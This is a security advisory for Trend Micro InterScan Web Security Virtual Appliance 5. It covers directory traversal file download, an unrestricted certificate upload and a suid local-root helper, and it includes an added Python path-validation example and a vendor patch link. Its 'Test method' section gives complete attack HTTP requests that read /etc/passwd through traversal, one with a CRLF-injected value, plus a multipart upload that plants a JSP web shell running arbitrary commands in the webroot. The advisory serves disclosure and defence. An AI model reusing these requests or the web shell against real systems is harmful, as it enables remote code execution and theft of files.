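Affected systems:
Trend Micro InterScan Web Security Virtual Appliance 5
Description:
BUGTRAQ ID: 41072
InterScan Web Security Virtual Appliance is a web filtering product that can be installed on the VMware platform.
InterScan Web Security Virtual Appliance does not properly filter the exportname parameter submitted to /servlet/com.trend.iwss.gui.servlet.exportreport or the pkg_name parameter submitted to /servlet/com.trend.iwss.gui.servlet.ConfigBackup, so a remote attacker can download arbitrary files from the system through a directory traversal attack.
The com.trend.iwss.gui.servlet.XMLRPCcert servlet of InterScan Web Security Virtual Appliance does not correctly perform security checks and allows users to upload files with arbitrary extensions. Uploading a specially crafted JSP script that contains a web shell leads to arbitrary command execution; in addition, a user can change the original destination path by using directory traversal.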
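A server-side check that would reject the traversal values and the JSP upload described above, as an added example that is not Trend Micro's code or part of the original advisory. The directories, the extension allow-list and the function names are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout and policy for illustration; not taken from the product.
EXPORT_DIR = "/var/iwss/export"   # hypothetical directory for report/backup downloads
UPLOAD_DIR = "/var/iwss/certs"    # hypothetical directory for imported certificates
CERT_EXTENSIONS = {".pem", ".crt", ".cer", ".key", ".p12"}


class UnsafeName(ValueError):
    """Raised when a client-supplied file name must be rejected."""


def safe_join(base_dir, client_name, allowed_ext=None):
    """Return a path inside base_dir for client_name, or raise UnsafeName."""
    name = unquote(client_name)
    # Control characters such as CR/LF or NUL never belong in a file name.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name):
        raise UnsafeName("control character in name")
    # Accept a bare file name only: no separators, no absolute path, no dot segments.
    if name in ("", ".", "..") or "/" in name or "\\" in name:
        raise UnsafeName("path separators or dot segments are not allowed")
    if allowed_ext is not None:
        ext = posixpath.splitext(name)[1].lower()
        if ext not in allowed_ext:
            raise UnsafeName("extension %r is not allowed" % ext)
    # Defence in depth: the normalised target must still sit under base_dir.
    # On a live system, also resolve symlinks (os.path.realpath) before comparing.
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, name))
    if posixpath.commonpath([base, target]) != base:
        raise UnsafeName("resolved path escapes base directory")
    return target


def check(base_dir, client_name, allowed_ext=None):
    """Return the safe path, or the string 'REJECT: <reason>'."""
    try:
        return safe_join(base_dir, client_name, allowed_ext)
    except UnsafeName as exc:
        return "REJECT: " + str(exc)
```

The same rule applies to all three parameters named in the advisory: the download handlers call it without an extension list, the certificate import calls it with one.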
The uihelper shell in InterScan Web Security Virtual Appliance has the suid bit set; a local user can execute commands with root privileges by running $ /usr/iwss/AdminUi/uihelper whoami.
<*Source: Ivan Huertas
Links: http://secunia.com/advisories/40328/
http://marc.info/?l=full-disclosure&m=127730641328283&q=p5
http://marc.info/?l=full-disclosure&m=127730618427877&q=p5
http://marc.info/?l=full-disclosure&m=127730628828036&q=p5
http://www.trendmicro.com/ftp/documentation/readme/iwsva_50_ar64_en_cp1386_readme.txt
*>
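Test method:
Warning
The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1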
Host: xxx.xxx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812/config_backup_result.jsp?op=export
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

op=2&ImEx_success=1&pkg_name=/etc/passwd%0D%0A

POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812
Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80
Content-Type: multipart/form-data; boundary=---------------------------80377104394420410598722900
Content-Length: 2912

-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="op"

save
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="defaultca"

yes
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_passphrase"

test
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_2passphrase"

test
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="beErrMsg"

imperr
-----------------------------80377104394420410598722900--
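Recommendation:
Vendor patch:
Trend Micro
-----------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249&regs=NABU&lang_loc=1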